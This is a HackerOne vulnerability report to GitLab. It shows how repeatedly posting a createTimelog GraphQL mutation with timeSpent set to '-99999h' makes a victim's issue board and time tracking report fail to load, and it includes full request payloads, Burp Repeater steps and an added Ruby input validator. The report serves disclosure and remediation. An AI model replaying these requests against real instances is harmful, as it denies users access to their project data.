Unvalidated `timeSpent` value in POST /api/graphql `createTimelog` operation leads to unable to load issues on Issue board
HackerOne report #2053154 by toukakirishima
on 2023-07-06, assigned to @cmaxim:
Report
Summary
I found a DoS vulnerability when adding Time spent on an Issue. As an attacker I can make the victim unable to see the Time tracking report and also unable to see the Issue on the Board.
Normally you can see the Time tracking report and the Issue on the Board.
But as an attacker I can make the victim unable to see the Time tracking report and also unable to see the Issue on the Board.
Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.
And Touka Kirishima (the victim) created some Issues.
Steps to reproduce
- Go to Issues
- Add Time spent
- Click save and make sure Burp Suite is on. You will see a request like the following. Example:
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23
Content-Type: application/json
X-Csrf-Token: x
X-Gitlab-Feature-Category: team_planning
Content-Length: 1234
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"1","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n timelogCreate(input: $input) {\n errors\n timelog {\n id\n issue {\n ...IssueTimeTrackingFragment\n __typename\n }\n mergeRequest {\n ...MergeRequestTimeTrackingFragment\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n\nfragment TimelogFragment on Timelog {\n __typename\n id\n timeSpent\n user {\n id\n name\n __typename\n }\n spentAt\n note {\n id\n body\n __typename\n }\n summary\n userPermissions {\n adminTimelog\n __typename\n }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n"}]
- Send to Repeater
- Change the timeSpent value. Example:
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23
Content-Type: application/json
X-Csrf-Token: x
X-Gitlab-Feature-Category: team_planning
Content-Length: 1234
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"-99999h","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n timelogCreate(input: $input) {\n errors\n timelog {\n id\n issue {\n ...IssueTimeTrackingFragment\n __typename\n }\n mergeRequest {\n ...MergeRequestTimeTrackingFragment\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n\nfragment TimelogFragment on Timelog {\n __typename\n id\n timeSpent\n user {\n id\n name\n __typename\n }\n spentAt\n note {\n id\n body\n __typename\n }\n summary\n userPermissions {\n adminTimelog\n __typename\n }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n"}]
- Click Send until the response HTTP/2 500 Internal Server Error appears (usually after clicking Send 5 times)
- Reload the page; you are unable to see the Time tracking report or the Issues on the Board
POV from Attacker
POV from Victim
POC
bandicam_2023-07-06_22-42-12-864.mp4
Output of checks
This bug happens on GitLab.com
Impact
- Attacker can make the victim unable to see the Time tracking report.
- Attacker can make the victim unable to see the Issues on the Board.
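The report does not say why the server returns 500 after repeated `-99999h` entries, so the following is an added example (not GitLab's code) of the server-side validation a `timelogCreate`-style mutation would apply before persisting: parse the duration string and reject any entry that would leave the issue's total negative or outside the storable integer range. Assumed here: a bare number means hours, 1d = 8h, 1w = 5d, 1mo = 4w, and the stored total is a signed 32-bit integer.

```ruby
# Added example (not GitLab's code): validate a timelog mutation's timeSpent
# string before it is applied to an issue's running total.
# Assumptions: bare numbers are hours, 1d = 8h, 1w = 5d, 1mo = 4w, and the
# persisted total is a signed 32-bit integer.
module TimelogValidator
  UNITS = { "mo" => 4 * 5 * 8 * 3600, "w" => 5 * 8 * 3600, "d" => 8 * 3600,
            "h" => 3600, "m" => 60, "s" => 1 }.freeze
  INT32_MIN = -(2**31)
  INT32_MAX = 2**31 - 1
  TOKEN = /(\d+)(mo|w|d|h|m|s)/

  # "1h 30m" -> 5400, "-99999h" -> -359996400, "1" -> 3600 (hours by assumption).
  # Returns nil for anything that does not parse, instead of guessing.
  def self.parse_time_spent(value)
    text = value.to_s.delete(" ")
    sign = 1
    if text.start_with?("-")
      sign = -1
      text = text[1..]
    end
    return sign * Integer(text, 10) * UNITS["h"] if text.match?(/\A\d+\z/)
    return nil unless text.match?(/\A(?:\d+(?:mo|w|d|h|m|s))+\z/)
    sign * text.scan(TOKEN).sum { |n, u| Integer(n, 10) * UNITS[u] }
  end

  # Decide whether applying time_spent to current_total (seconds) is safe.
  # Returns [accepted?, reason]; every rejection is an explicit reason, not a 500.
  def self.check(current_total, time_spent)
    delta = parse_time_spent(time_spent)
    return [false, "unparseable time spent"] if delta.nil?
    return [false, "time spent must be non-zero"] if delta.zero?
    return [false, "time spent outside storable range"] unless delta.between?(INT32_MIN, INT32_MAX)
    new_total = current_total + delta
    return [false, "time to subtract exceeds the total time spent"] if new_total.negative?
    return [false, "total time spent would exceed storable range"] if new_total > INT32_MAX
    [true, "ok"]
  end

  # Replay a sequence of timeSpent values the way repeated mutation calls would
  # be processed; rejected values leave the total untouched.
  def self.replay(values)
    total = 0
    rejected = []
    values.each do |v|
      ok, reason = check(total, v)
      if ok
        total += parse_time_spent(v)
      else
        rejected << [v, reason]
      end
    end
    [total, rejected]
  end
end
```

Replaying the report's sequence (one `1` followed by five `-99999h`) through `replay` accepts only the first entry and rejects every negative one, so the total never leaves the range the UI can render.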
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- image.png
- bandicam_2023-07-06_22-42-12-864.mp4
How To Reproduce
Please add reproducibility information to this section: